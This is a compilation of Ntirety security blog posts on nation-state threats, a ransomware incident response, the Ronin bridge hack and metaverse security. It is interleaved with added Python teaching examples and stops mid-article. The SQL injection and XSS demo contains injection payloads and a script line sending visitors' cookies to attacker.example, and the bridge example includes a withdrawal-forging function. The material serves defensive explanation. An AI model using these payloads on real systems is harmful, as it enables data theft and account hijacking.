Citing cyberthreats: Why we should be worried

Complacency is not an option when it comes to cybersecurity. Ntirety CEO Emil Sayegh highlights prominent cyberthreats we are facing today in the following piece.

Citing cyberthreats: Why we should be worried

In the wake of global conflicts, significant concerns about the security of critical domestic cyber operations have dominated the news. Yet, despite all the urgent alerts and notices, after several weeks of escalated scenarios of aggression, it seems the "big one" hasn't quite hit. On one hand, our power is still on, our water still flows, and our kids can still walk over to the campus ATM and check their balances. Have our adversaries been holding back? Or is something else happening? Threat activity levels are higher than ever, and it is more likely that cyber chaos is lying in wait. Remember the quiet on the Western Front: this is the time to worry the most.

There is little debate that the primary channel for conflicts in the world today is rooted in offensive cyber capabilities. In recent years, attacks from nation-states and state-sponsored groups have surged and include corporate espionage, ransomware schemes, software supply chain breaches, fundraising for terrorist activities, and more. At times it seems that cybersecurity is an epic cat-and-mouse battle.

The U.S. is the Target

Let's be clear; it is not just Russia. Even the slightest indication of weakened security is an opportunity for adversaries and foes. China, Iran, North Korea, and even other actors that are technically our allies will not let an opportunity for technological chaos go to waste. This is our modern Roman arena, and we are not viewed as the lions; we are viewed as the bait, and almost everybody is coming at us.

One simple fact of these threats is that a history of successful attacks begets continued attacks. Attack vectors, techniques, and tools are shared in private corners of the web.
Successful campaigns also generate cryptocurrency wealth that can fund war, sponsor terrorist groups, and spawn new attacks and new attackers.

Russian Capability

Russian offensive cyber operations are highly advanced, and many experts have attributed the SolarWinds attack of 2020 to suspected Russian sources. This incident was a sophisticated infiltration of a major software supplier, and the compromise affected thousands of that supplier's customers. Operations at that scale take time, incorporating full-cycle targeting, social engineering, payload development, and surveillance over the course of many months.

In the war in Ukraine, cyberattacks came first. As a prelude to the land attack, these operations destructively took out government agencies, banking facilities, and other critical offices. These were official military actions, but Russia also wields a hidden force of citizens who see hacking as a form of patriotism and survival as the world continues to apply economic sanctions on the country. Attacks could persist for years beyond the cessation of violence.

Attack Signals Not Stopping

The first quarter of this year is behind us, and we are already seeing a high number of novel methods emerge as well as a heightened and accelerated scale of cyber threat activity across the board. The company I lead has recorded an 800% increase in threat activity since the war first started, and it is not abating in any sense of the word. We continue to work with high-level government agencies on a frequent basis to help protect the ecosystem of companies within our client base and beyond. We have the Okta situation, new Android malware, reports of suspected Russian and Chinese capabilities to defeat two-factor authentication, and specific failure incidents, such as the report of a major storage provider permanently losing customer data.
If it isn't clear already, it one day will be: flaws and human interaction can weaken technology, but technology combined with a commitment to thorough security practices can close significant gaps. There is definitive proof that global criminal and perhaps intelligence syndicates are driving this increased activity, and the day of the lone hacker is history. Such is a global cyberwar. Companies cannot withstand this escalating onslaught alone. We must take up arms to protect what is ours. This is an invasion of an entirely different kind, and we must protect the homeland in the cloud, on our keyboards, our televisions, and our mobile devices.

Preparation and Targets

We have so much to protect. First, our military and economic foundation are highly dependent on digital terrestrial and satellite technologies. The protection of that backbone is critical, and these are primary targets. However, the frontlines in this battle are everywhere we go and everywhere we live, so right away and urgently, our national base of cyber readiness must get up to speed on security matters. Only a comprehensive security strategy will solve this once and for all, but until then, we can steel ourselves against this persistent wave of threats with basic actions:

Lock down networks and systems
Implement tested and validated backups
Implement multi-factor authentication
Patch systems and software
Turn on monitoring and alerting (everywhere)

On a personal level, pay attention to your passwords. Make them long, complex, and unique, and change them promptly after any sign of compromise. Implement multi-factor authentication everywhere possible. Stay aware of phishing attempts, malicious links, and every form of cybersecurity responsibility you bear for yourself and the companies you work for.

It is the natural order of things that big-name companies are going to hold a higher target value. Russia, like many other nations that wield cyber threat operations, is in a position where it can rely entirely on symbolic victories in its cyberattack campaigns.
You can count Coca-Cola, ExxonMobil, and even Tesla as organizations that are probably on heightened alert due to their very public business decisions taken in response to Russia's attack.

The Silver Lining

Industry awareness of these threats has improved, and the fact that we have survived this long ties back to the hardening throughout the industry following two years of pandemic-driven challenges. The fires of that digital chaos and the improved response are positive historical touchstones. We will find that only a complete lifecycle of comprehensive security can protect what is truly essential. Eventually, the Russian crisis on the ground will pass, but another crisis is looming. Silent digital attacks are a prelude to greater actions, and the stillness is a false sign of security. Russia, China, and other global adversaries are stacked up for a global confrontation, hoping that the weakest target may precipitate our fall.

Check out this piece, originally published in Security Magazine, and follow me on LinkedIn.
Anatomy of a Comprehensive Security Response

The frontlines of current cyber threat conditions are an interesting combination of rogue threat actors, state-sponsored groups, and Advanced Persistent Threats (APTs). Their intrusions are characterized by stealth, patience, and slow-burn campaigns that are well funded toward their missions. These threats focus on reconnaissance, weaponization, and evading detection, carried out as a deliberate sequence of escalating steps. Even with multiple layers of technical protection, malicious activity still occurs on the most privileged networks. This is an account of how a recent incident in a protected environment was uncovered through diligence and forensic review.

If you could visualize a successful cyberattack in review, you would see that the journey is a lot like skipping across stones in a river. Here, we are going to dissect such an attack. The object of cybersecurity protections is to review every stone and stop attacks at every possible point. Uncovering threats can rely on automated detection, artificial intelligence, and alerting to varying degrees. However, the information uncovered in these scenarios requires analysis and a threat disposition by trained and qualified human beings.

Anatomy of the Incident

Let us dissect an actual security incident, so we can gain an appreciation of what it takes to mitigate the millions of incidents that happen every day. In the pre-dawn hours of a recent morning, the Ntirety Security Operations Center (SOC) received the first of a series of behavioral threat alerts for an endpoint system within a client's environment. The alert was triaged as a potential ransomware event. An immediate investigation into this system was launched, and it was discovered that a portion of the files on the system were encrypted. The investigation further showed that the operating system was still functional, with no other observable impact.
Tier 2 SOC personnel initiated an immediate network containment action to isolate the threat and prevent any further lateral movement. Tier 2 SOC personnel continued to scan logs and immediate network connections for signs of further propagation. As the investigation continued, these findings were negative.

The SOC initiated a Root Cause Analysis and determined that the initial point of entry for this ransomware attack was an unpatched, externally facing server that did not have standard security products installed. This server was scheduled for decommissioning. Further, an administrator account on this system had been compromised; it used a weak, eight-character password that had never been changed. The affected server was completely compromised, with evidence of full system encryption. A ransom note and additional tracking evidence showed the attack was most likely CryLock ransomware, a newer variant of Cryakl ransomware. Further investigation uncovered that the attacker(s) were able to log in and install software to maintain remote persistence on the server. System and Security event logs could not be recovered, indicating the logs had been cleared by the attacker. With that foothold in place, the attack attempted to escalate by moving laterally to the endpoint system, where our detection tools were able to catch it before any further damage could be done.

As an epilogue, the customer received guidance and recommendations covering decommissioning the server as soon as possible, wiping and re-imaging the affected workstation, network isolation, strong password enforcement practices, and installation of our advanced security tools throughout all systems in their environment.

The Comprehensive Response

Client environments have all kinds of interesting facets to them that can affect overall security.
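The three behaviours the root cause analysis surfaced above (event logs cleared, a remote login followed by a persistence install, and a hop from the compromised server to a second host) are exactly the kind of sequence a SOC can alert on, provided the logs are forwarded off the box before they can be wiped. The following is an added example, not Ntirety's tooling and not the real logs from this incident: a small Python detector run over constructed Windows event records. The field names, hostnames, addresses and the 30-minute window are assumptions for illustration; the event IDs are the standard Windows ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of forwarded Windows event records, shaped like the incident
# described above. Illustrative records only, not logs from the real case.
# Event IDs used: 4624 = successful logon (logon_type 10 = RemoteInteractive/RDP,
# 3 = network), 7045 = new service installed, 1102 = Security audit log cleared,
# 104 = System event log cleared.
SAMPLE_EVENTS = [
    {"time": "2022-04-12T03:02:10", "host": "legacy-web01", "id": 4624,
     "logon_type": 10, "user": "Administrator", "src": "203.0.113.45"},
    {"time": "2022-04-12T03:05:41", "host": "legacy-web01", "id": 7045,
     "user": "Administrator", "service": "RemoteSvcHelper"},
    {"time": "2022-04-12T03:20:03", "host": "legacy-web01", "id": 1102,
     "user": "Administrator"},
    {"time": "2022-04-12T03:21:15", "host": "legacy-web01", "id": 104,
     "user": "Administrator"},
    {"time": "2022-04-12T03:40:22", "host": "ws-finance07", "id": 4624,
     "logon_type": 3, "user": "Administrator", "src": "10.10.5.21"},
    {"time": "2022-04-12T09:15:00", "host": "ws-hr02", "id": 4624,
     "logon_type": 2, "user": "jdoe", "src": "-"},
]

# Constructed asset inventory: hostname -> internal address (assumption).
HOST_IPS = {"legacy-web01": "10.10.5.21", "ws-finance07": "10.10.7.33"}


def _t(event):
    return datetime.fromisoformat(event["time"])


def detect(events, window=timedelta(minutes=30)):
    """Return (rule, host, time) findings for the three behaviours in the incident."""
    events = sorted(events, key=_t)
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    findings = []

    # Rule 1: a cleared log is the attacker announcing they were there. This only
    # fires if the event reached a collector before the local copy was wiped.
    for e in events:
        if e["id"] in (1102, 104):
            findings.append(("log_cleared", e["host"], e["time"]))

    # Rule 2: interactive remote logon followed within the window by a new
    # service is the classic "log in, drop a persistence tool" pattern.
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            if e["id"] == 4624 and e.get("logon_type") == 10:
                for f in evs[i + 1:]:
                    if _t(f) - _t(e) > window:
                        break
                    if f["id"] == 7045:
                        findings.append(("persistence_after_remote_logon", host, f["time"]))
                        break

    # Rule 3: a network logon onto another host whose source address belongs to
    # an already-flagged host is the lateral hop described in the text.
    flagged_ips = {HOST_IPS[h] for _, h, _ in findings if h in HOST_IPS}
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 3 and e.get("src") in flagged_ips:
            findings.append(("lateral_movement", e["host"], e["time"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding)
```

Rule 1 is only as good as log forwarding: on the server in the incident the local logs were gone, so the clear event is visible only if a copy had already left the host. Rule 3 keys off the asset inventory, which is why an accurate map of hostnames to addresses matters to detection, not only to operations.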
Sometimes there is a bit of baggage, such as a legacy operating system or application that has no available updates or is tied to legacy by means of licensing, contract, or a functional gap. That legacy OS was the first problem. Missing security tools were the next issue. From there, we have an unpatched public-facing system, weak and unmanaged privileged passwords, and an open network hop that allowed the attempt at lateral propagation. You can call that an unfortunate mix of vulnerabilities that could have led to a major problem. However, comprehensive practices came through in the detection of anomalous events at the first point possible. Our SOC sprang into action, according to plan, and we were able to fully ascertain the situation and prevent any further incidents. You can see how one unprotected system has the potential for significant impact, but by layering detection and response throughout the environment, we can mitigate the unknown.

The goals of the Ntirety SOC and the application of comprehensive security principles have common targets. We are focused on minimizing the impact of incidents and breaches on our client organizations. To minimize impact, we are focused on responding to incidents quickly and reducing the time it takes to detect and enact our responses. By effectively remediating security conditions and maintaining security baselines throughout our client environments, we work toward preventing major incidents from occurring. Detection, analysis, investigation, and remediation are some of the milestone capabilities of our comprehensive defensive systems. In the current and future climate of threat conditions, this is the best available path to uncovering the unknown, revealing hidden threats and adversarial activities, and identifying attacks before they scale.
6 Reasons Why Entrepreneurs Should Take Security Seriously

Being an entrepreneur involves some serious hustle in order to make a dream a reality. While it can be tempting to handle everything on your own, cybersecurity requires teamwork. Read this piece from Ntirety CEO Emil Sayegh, originally published in Forbes, to learn more about why cybersecurity should always be a part of an entrepreneur's strategy.

6 Reasons Why Entrepreneurs Should Take Security Seriously

Of all the rules and advice available about running your own business, the best pertains to what mistakes to avoid. At the top of the list of mistakes to avoid as an entrepreneur: do not do everything yourself. By default, when an individual chooses to do something, they are choosing not to do something else. Yet despite that simplicity, the inclination to do it all in entrepreneur mode is tempting. We want to know every brick of our business, and we are willing to subscribe to the icon of hard work and high rewards. The reality is, there is too much on the line, and you could be doing other things that you are much better at. It's a powerful choice that separates leaders from the rest of the pack. In his book Good to Great, Jim Collins calls it Level 5 leadership, a level we all aspire to reach. Choosing what your organization does and does not do is one of the most critical leadership tasks imaginable.

This choice applies to our most precious digital assets as well. Information needs to get where it needs to go in a way that is safe. You are not an expert at everything in technology, even if you are a technologist at heart. If you try to be, you end up doing less than you could have on a much more valuable task. Once you can afford it, hiring experts has tremendous advantages, especially when you regain time and opportunities in doing so. When it comes to IT security, however, you simply can't face these challenges alone.
Cybersecurity is not a finish-line initiative where you can roll out a tool of some sort and call it a day. The threats are ever-changing and escalating, meaning that protecting your business requires keeping a continual watch on your assets; you must never let your guard down against ever-evolving vulnerabilities. The risks are just too great to "roll your own." These are the top reasons why, as an entrepreneur, your IT security should be taken seriously.

Impossible Task: Across the globe, more than 30,000 websites are hacked daily. A new attack happens somewhere every 39 seconds. More than 300,000 new pieces of malware are created each day. DDoS attacks, malicious apps, phishing, zero-day attacks, and other security concerns threaten every business, even the small ones. Your adversaries are not individuals but nation-states, criminal organizations, and hive-minded hackers. No entrepreneur can do this alone, and just because an incident has not happened to you, it does not make you immune.

Reputation: Nobody is immune to the reputational damage that comes in the wake of a cyber incident. Consider the value and reputation loss for companies like SolarWinds, FireEye, and others, and the association with their founders, executives, and company boards.

Financial Losses: An incident can wreck your finances for good. Between recovery efforts, penalties, and loss of income, a cyber incident can affect a small company's bottom line significantly. A 2017 Ponemon Institute study put the average cost for small businesses at $500,000 per incident. This calculation only scratches the surface of legal costs, compliance penalties under HIPAA and GDPR, lost revenue due to downtime, and so on.

Losing the Board and Investors: The Board of Directors and investors have a stake in the sanctity of the business. There is nothing like a cybersecurity incident and a chain-of-business-ownership crisis to put one at odds with these critical business advocates.
The perceived savings of executing your own security are simply not worth it.

Endangering Employees: Taking on security alone can endanger your employees, who are your most important asset, through the theft of employee data, including sensitive HR files, dates of birth, financial information, and more.

Financial Theft: Cyber thieves, in many manifestations, are out there. Whether it's a lone hacker, a team of criminals, or a nation-state organization, there is high value placed on the extraction of financial data, and the methods being used are crafty, escalating, and unpredictable.

At the risk of repetition, understand that entrepreneurs know their businesses, but they are not experts at everything. When security giants like FireEye fall to modern, sophisticated cyberattacks, as we've seen in recent news, you should get a sense of how critical it is not to take on the challenge of cybersecurity alone. Focus on the things you do best, and stop doing the things you shouldn't be.

Check out this piece, originally published in Forbes, and follow me on LinkedIn.
Why Security Maturity is Necessary for Your Business

A security maturity model is a set of characteristics that represent an organization's security progression and capabilities. According to CISOSHARE, Key Process Areas (KPAs) in a security maturity model are practices that help improve a security infrastructure. These KPAs include:

Commitment to perform
Ability to perform
Activities performed
Measurement and analysis of the results
Verifying the implementation of processes

Levels of security maturity range from 1 (lowest) to 5 (highest). Various industries lie within these levels, depending on their security needs. The retail industry typically falls under Levels 2 or 3, manufacturing falls between Levels 3 and 5, while fintech and healthcare are between Levels 4 and 5 due to the high levels of compliance needed in these industries.

Ntirety details these levels of security maturity by detection, response, and recovery times:

Level                   Time to Detect   Time to Respond   Time to Recovery   Recovery Point        Compliance
1 (Vulnerable)          Weeks/months     Weeks             Unknowable         Unknowable            None
2 (Aware & Reactive)    Days             Hours             1-2 days           <2 days data loss     Internal objectives
3 (Effective)           Hours            Minutes           Hours              <24 hours data loss   Internal & 3rd party
4 (Compliant)           Minutes          Minutes           Hours              <6 hours data loss    Internal & 3rd party
5 (Optimizing)          Immediate        Immediate         Immediate          <15 min data loss     Internal & 3rd party

How Ntirety Helps With Security Maturity

With over 20 years of industry experience, Ntirety understands how to support a business's cybersecurity maturity needs and follow
the necessary processes to ensure a smooth transition into IT transformation. For a company to assess its security maturity with Ntirety, the first step is a conversational assessment with our team to determine the security gaps in your business's cyber infrastructure. By answering some questions, our team can see where your business lies in the security maturity framework and compare it to your goals. Whether the driver is the industry vertical your company falls under, adopting best practices within your IT infrastructure operations, or a board mandate, we can help formulate a plan based on your business's needs.

Following an assessment, the Ntirety team can detail how to improve Protection, Recovery, and Assurance. Ntirety's Guidance Level Agreements (GLAs) can help improve these areas by optimizing availability, security, performance, and costs. Ntirety is committed to securing the "entirety" of your environment through solutions that identify, inventory, and protect the entire target environment. Ntirety's Compliant Security Framework covers the security process from establishing your security design and objectives through protection, recovery, and assurance of compliance with your security requirements.

One mistake we often see with companies is the idea that doing it themselves is the safer option. While resourcing a cybersecurity solution internally may seem more manageable, it can be far more costly and take away from other essential business functions.
Here are the top 7 reasons to outsource security:

Finding and maintaining a talented SIEM/SOC team is expensive
Benefiting from trends and detections observed across other customers
Access to more threat intelligence and state-of-the-art technology
Long-term return on investment
Outsourcing lowers the risk of conflicts of interest between departments
Enhanced efficiency, letting you concentrate on your primary business
Scalability and flexibility

For more details on securing your cyber infrastructure, watch our most recent webinar and schedule an assessment with us today.
Reflecting On The Biggest Crypto Hack Ever

Crypto has been a hot topic in recent news. It is relatively new, and security protocols unfortunately are not a high priority. Read this piece from Ntirety CEO Emil Sayegh, originally published in Forbes, for more insight.

Reflecting On The Biggest Crypto Hack Ever

The gaming and crypto worlds have reacted strongly to the news of a major attack that cost one crypto-gaming network upwards of $625 million in assets. The Ronin hack is among the largest crypto heists in history, and when the dust settles, the incident may wear that crown alone. The story of this crypto-gaming company holds valid lessons for any organization that is watching.

Big Pity for Crypto

Crypto is known to the masses as an investment vehicle, and to some it is known as a payment channel for scams and hacks. Since the beginning, crypto has provided a fascinating ride, but bad actors have inevitably been there all along. Along the way, they ruined some parties. As it stands, the yearly damage from crypto theft and fraud worldwide is estimated at over $10 billion per year (and growing). These statistics have created doubt about the security capabilities of the cryptocurrency industry. The Ronin hack holds clues to that uncertain crypto future.

Breaking Down the Heist

Parties behind the Ronin network reported that validator nodes were subverted using stolen private keys, which were then used to sign forged withdrawals. These nodes formed the bridge into a popular game known as "Axie Infinity," notable for its thorough NFT and crypto monetization. The attackers were able to exploit a back door in a node that was part of the network's validation protections. With enough validator keys in hand, the attackers were able to withdraw 173,600 ether and 25.5 million USDC. Now, the network must hope that government law enforcement agencies can assist in recovering the stolen assets.
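The forgery described above comes down to a threshold: a bridge that honours a withdrawal once m of its n validators have signed it is safe only while an attacker holds fewer than m keys, and validators whose keys or signing approvals all sit on one operator's infrastructure are not independent no matter how many there are. The following is an added example, not Ronin or Sky Mavis code: a toy m-of-n bridge in Python that uses HMAC-SHA256 as a stand-in for real validator signatures, a 5-of-9 validator set (Ronin's publicly reported threshold), and a constructed ownership map. The validator names, the withdrawal record and the "delegated approval" are assumptions for illustration.

```python
import hashlib
import hmac
import json
import secrets

# Added example, not Sky Mavis or Ronin code. HMAC-SHA256 stands in for the
# validators' real signature scheme so the block runs with the standard library
# only; the threshold logic, not the primitive, is the point.


def sign(secret_key, message):
    return hmac.new(secret_key, message, hashlib.sha256).hexdigest()


class BridgeValidatorSet:
    """An m-of-n bridge: a withdrawal is honoured once at least `threshold`
    distinct registered validators have signed it."""

    def __init__(self, registry, threshold):
        # registry: {validator_id: verification key}. With HMAC the verification
        # key equals the signing key, which is why real bridges use asymmetric
        # signatures; the counting logic is the same either way.
        self.registry = registry
        self.threshold = threshold

    @staticmethod
    def encode(withdrawal):
        return json.dumps(withdrawal, sort_keys=True).encode()

    def approve(self, withdrawal, signatures):
        msg = self.encode(withdrawal)
        signers = set()
        for validator_id, sig in signatures:
            key = self.registry.get(validator_id)
            if key is None:
                continue  # not a registered validator
            if hmac.compare_digest(sign(key, msg), sig):
                signers.add(validator_id)  # a set: one key signing twice counts once
        return len(signers) >= self.threshold


def forge_withdrawal(bridge, stolen_keys, withdrawal):
    """What an attacker holding stolen_keys ({validator_id: key}) can push through."""
    msg = bridge.encode(withdrawal)
    sigs = [(vid, sign(key, msg)) for vid, key in stolen_keys.items()]
    return bridge.approve(withdrawal, sigs)


def operators_needed_to_forge(key_owner, threshold):
    """Fewest independent operators whose compromise yields `threshold` keys.
    key_owner maps validator_id -> the party that actually controls signing for
    it, including keys whose approvals were delegated to someone else's node."""
    per_owner = {}
    for owner in key_owner.values():
        per_owner[owner] = per_owner.get(owner, 0) + 1
    have = count = 0
    for n in sorted(per_owner.values(), reverse=True):
        have += n
        count += 1
        if have >= threshold:
            return count
    return None  # fewer keys than the threshold exist at all


# Constructed 5-of-9 validator set; 5 of 9 is Ronin's publicly reported threshold.
VALIDATOR_KEYS = {f"validator-{i}": secrets.token_bytes(32) for i in range(9)}
BRIDGE = BridgeValidatorSet(VALIDATOR_KEYS, threshold=5)
WITHDRAWAL = {"to": "0xattacker", "asset": "ETH", "amount": 173600}  # constructed


def demo():
    names = list(VALIDATOR_KEYS)
    four = {k: VALIDATOR_KEYS[k] for k in names[:4]}
    five = {k: VALIDATOR_KEYS[k] for k in names[:5]}
    # Replaying one stolen key five times must not count as five signers.
    msg = BRIDGE.encode(WITHDRAWAL)
    replay = [("validator-0", sign(VALIDATOR_KEYS["validator-0"], msg))] * 5
    # Constructed ownership: one operator runs four validators and also holds a
    # standing approval for a fifth that a partner delegated and never revoked.
    owners = {f"validator-{i}": "operator-A" for i in range(5)}
    owners.update({f"validator-{i}": f"operator-{i}" for i in range(5, 9)})
    return {
        "four_keys_forge": forge_withdrawal(BRIDGE, four, WITHDRAWAL),
        "five_keys_forge": forge_withdrawal(BRIDGE, five, WITHDRAWAL),
        "replay_one_key": BRIDGE.approve(WITHDRAWAL, replay),
        "operators_to_forge": operators_needed_to_forge(owners, 5),
        "operators_if_independent": operators_needed_to_forge({k: k for k in names}, 5),
    }


if __name__ == "__main__":
    print(demo())
```

Two checks worth copying: signers are counted as a set, so replaying one stolen key never reaches the threshold, and operators_needed_to_forge states the threshold in parties that must be compromised rather than in keys, which is the number that actually describes a bridge's security.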
Shortcuts and Bad Decisions

Sky Mavis, the company behind the Axie Infinity game, shared that the attack was possible in part because "immense user load" drove the company to take a self-described "shortcut." Let's be clear. This looks like a bad decision that lost sight of the risks. Fixing this specific flaw might be a minor technical affair, but the company must now release a substantial plan that addresses how it plans, technically and philosophically, to prevent this sort of issue from happening again. In this matter, again and again, assets became liabilities, and they were blind to recognizing when that transition occurred.

Crypto Liabilities?

If risks continue to be treated this way, by anyone, flawed decisions will continue to be a costly problem. The currency at risk can consist of data, crypto, passwords, cash transactions, or anything you would want to protect and provide. Let us run down the specifics of why this is a growing problem for organizations that rely on crypto assets.

1. Cyber liability insurance: It will not cover all your losses. As a matter of fact, the entire cyber insurance industry is being reborn with skyrocketing premiums as it evolves to adapt to heightened threats, ransom amounts, and costs.
2. Activity surge: Billions in crypto assets are stolen each year. Reports indicate that the figure is in the tens of billions and growing. Many parties are engaged in these activities, including North Korea, which has been linked to an estimated $1.7 B of stolen crypto in 2021.
3. Crypto nature: Crypto happens to be the medium of choice for online crime in part because it is difficult to trace and has no central controlling authority, yet is accessible throughout the world. It is also difficult for law enforcement to recover.
4. The private key is GOLD: The possessor of a cryptocurrency account's private key wields total and exclusive control. Stealing a private key is like the theft of any other piece of sensitive information.
Scammers will use any means at their disposal to gain access, including social engineering, email scams, phishing, and more.

Safe Crypto for Us

On a personal level, it makes sense to protect your assets using multi-factor authentication (MFA) for sensitive accounts and configuring your notifications correctly. Any major activity on your account should be tracked, and it should alert you. You should also:

Protect your secret keys well: this means strong passwords combined with MFA. Never share your keys.
Avoid public networks and Wi-Fi: keep your transactions on secured and trusted networks only.
Use strong, unique passwords: do not rely on MFA alone or combine it with weak passwords. Never share them.
Keep your crypto secure: use hardware wallets, and never keep your keys in online storage.
Make sure your apps and exchanges are secure: if you're using mobile, review and validate every app and crypto exchange you use for security features and reputation.

Safe Crypto for Business

When protected by constant security measures, cryptocurrency in the enterprise can be a safe and viable business feature that can be implemented in exchanges, consumer and business transactions, application features, marketplaces, and more. This should not be a surprise, but it turns out that cryptocurrency security is no different from IT security, making it very secure when implemented correctly. At its core, cryptocurrency relies on the blockchain; by design, its changes and updates are immutable, publicly distributed, held in multiple copies, and continually validated by cryptographically signed transactions at every step. Blockchain alone is great, but when it comes to business, you need reassurances, and you need awareness. These are fundamental components of comprehensive security, which is the way to go in protecting crypto in the enterprise.
Protecting crypto systems in the enterprise depends on ensuring the base platform is fully safe and secure through a comprehensive security approach. After all, not all platforms are equal. You then must make sure that the security state stays that way, ensuring that the internals of your crypto foundation are continuously known. If anything goes wrong or changes, you should know immediately, which leads to another critical linchpin of comprehensive security: monitoring systems. We all expect these sorts of protections for financial transactions. It makes sense for crypto as well, even in a game.

Check out this piece, originally published in Forbes, and follow me on LinkedIn.
The New Normal for Cybersecurity

Cybersecurity seems to be making news headlines more and more recently. Hackers are becoming more widespread and more efficient, with ransomware attacks up 105% from 2020 to 2021 according to the 2022 Cyber Threat Report. With new virtual realms such as the Metaverse within reach, it is crucial that proper protocols are put in place. For a Security Operations Center (SOC), monitoring customer infrastructure activity and quickly mitigating cyber threats is always a top priority, but it is especially important right now as conflict continues between Russia and Ukraine. Current advanced persistent threat (APT) activity and destructive malware include:

Disinformation, defacements, and Distributed Denial of Service (DDoS)
Destructive wiper malware families:
  WhisperGate
  HermeticWiper
  IsaacWiper

All of these attacks are initiated to spread propaganda or disrupt normal operations for businesses and individuals. The destructive wipers are malware built to destroy data and programs and render systems unbootable, with crippling results for affected businesses. Following the initial attacks on Ukraine, cyberthreat activity was heightened globally by over 800%. While the Ntirety SOC team has not seen any targeting of Ntirety customers, we know that this could change at any moment, so we remain vigilant. We are continuing to take steps to enhance cybersecurity postures and increase monitoring for cyber threats.

Many data breaches can be traced back to the tiniest flaws, such as a weak or stolen password. As cybercriminal groups grow, it can be difficult for security teams to seal the cracks and fix the bugs fast enough. Protecting your business should be an ongoing effort, as there will always be cyberthreats. It is important to have all the right tools and technologies in place, working together. Cyber attackers look for access through endpoints; these endpoints are easily discoverable, readily available, and easy to access.
As remote work has become increasingly common, these endpoints, which were once located in relatively secure buildings, have moved outside the four walls of an office. From these endpoints, cybercriminals will steal data and take down critical applications. Malicious attacks can include:

Phishing: users surrender personal information by responding to fake official emails or links to fake websites
Malware: "malicious software" designed to damage or control IT systems (example: ransomware)
Man-in-the-middle attacks: attackers insert themselves between your computer and the web server
DDoS: "Distributed Denial of Service," in which a network of computers overloads a server with traffic, taking it down
Internet of Things and edge processing: rogue data theft; user error (such as not encrypting)
SQL injection: malicious input is spliced into a database query, letting an attacker read, modify, or corrupt data the application never meant to expose
Cross-site scripting: malicious script is injected into a website to target the visitor's browser

Attackers are continuing to evolve their game and crowdsource their efforts. They find vulnerabilities and exploit weak points within cyber infrastructures. With the help of Ntirety's SOC, your business will have eyes on your cyber infrastructure 24x7x365. For more information, watch our recent webinar and stay tuned for the next blog in this series.
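Two of the items in the list above, SQL injection and cross-site scripting, are easier to understand as a vulnerable snippet beside its fix than as a one-line definition. The following is an added example, not Ntirety code: Python against an in-memory SQLite database with constructed rows and constructed attacker inputs. The table name, columns, hashes and payloads are assumptions for illustration.

```python
import html
import sqlite3

# Added example, not Ntirety code. An in-memory SQLite database stands in for a
# real application back end; the table and its rows are constructed.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "pbkdf2$c0ffee", "admin"), ("bob", "pbkdf2$d00d", "user")])
    return conn


def find_user_vulnerable(conn, username):
    # Untrusted input is spliced into the SQL text, so a quote in the input
    # changes the query's structure instead of being compared as data.
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    # Parameter binding: the value travels separately from the SQL text, so
    # whatever the input contains, it can only ever be compared as a string.
    return conn.execute("SELECT username, role FROM users WHERE username = ?",
                        (username,)).fetchall()


def render_comment_vulnerable(comment):
    # Reflecting user text straight into HTML lets a <script> tag run in every
    # visitor's browser (cross-site scripting).
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    # Escaping turns markup characters into entities: displayed, not parsed.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# Constructed attacker inputs.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "nobody' UNION SELECT username, password_hash FROM users --"
XSS = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


def demo():
    conn = make_db()
    return {
        "vuln_tautology": find_user_vulnerable(conn, TAUTOLOGY),  # every row
        "vuln_union": find_user_vulnerable(conn, UNION_DUMP),     # hashes leak
        "safe_tautology": find_user_safe(conn, TAUTOLOGY),        # no such user
        "safe_union": find_user_safe(conn, UNION_DUMP),           # no such user
        "safe_normal": find_user_safe(conn, "alice"),
        "xss_vuln": render_comment_vulnerable(XSS),
        "xss_safe": render_comment_safe(XSS),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The tautology payload turns a single-user lookup into a dump of every row, and the UNION payload pulls a column the query never selected; parameter binding defeats both without any input filtering. For the HTML case the fix is likewise contextual escaping at output time, not trying to block the word "script".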
How To Secure A Metaverse

The Metaverse is an exciting concept with seemingly endless possibilities. Before enjoying and building this virtual realm, it is critical that we learn from our past and begin with solid privacy and cybersecurity strategies. The following piece from Ntirety CEO Emil Sayegh was originally published in Forbes, and it details security steps that Meta can take.

How To Secure A Metaverse

Many are wondering about the metaverse and speculating whether it is a hard trend or a soft trend. Questions abound: what will it look like, what will its impact on us be, and how will it interact with our daily lives? At the root of the metaverse concept, physical boundaries will cease to be a limitation on how we engage with others, engage with businesses, and consume information. We are opening ourselves up to exposure by novel digital means to a world that will expand without limits. For many, the biggest concerns about the metaverse are privacy and cybersecurity. As we embark upon this new age of digital exploration, it is critical to structure this world of virtual engagement with secure concepts, grounded principles, and privacy-based technologies. We have a lot of work ahead of us to map out the principles of how the real world interacts with this virtual future.

Rebuilding a (Mostly) Secure World

The web today has evolved greatly from its earliest days of uncharted freedom and dial-up technologies. It didn't take long, however, before malicious actors, trolls, bots, nation-states, and permutations of digital anomalies changed the game. This landscape of threats and vulnerabilities especially matured as commerce, finance, and general businesses came to adopt web-based technologies. We are going to have to re-envision many things all over again, including things we don't really think about frequently anymore.
Definitions, rights, laws and regulations, and our collective perspectives will all have to be re-engaged quickly as the metaverse arrives and builds out. For example, in the metaverse, legal jurisdictions and boundaries have no practical definition yet. This is a challenge we collectively worked through for cyber and web activities two decades ago, and now we get to do it all over again.

The Foundations of a Secure Metaverse

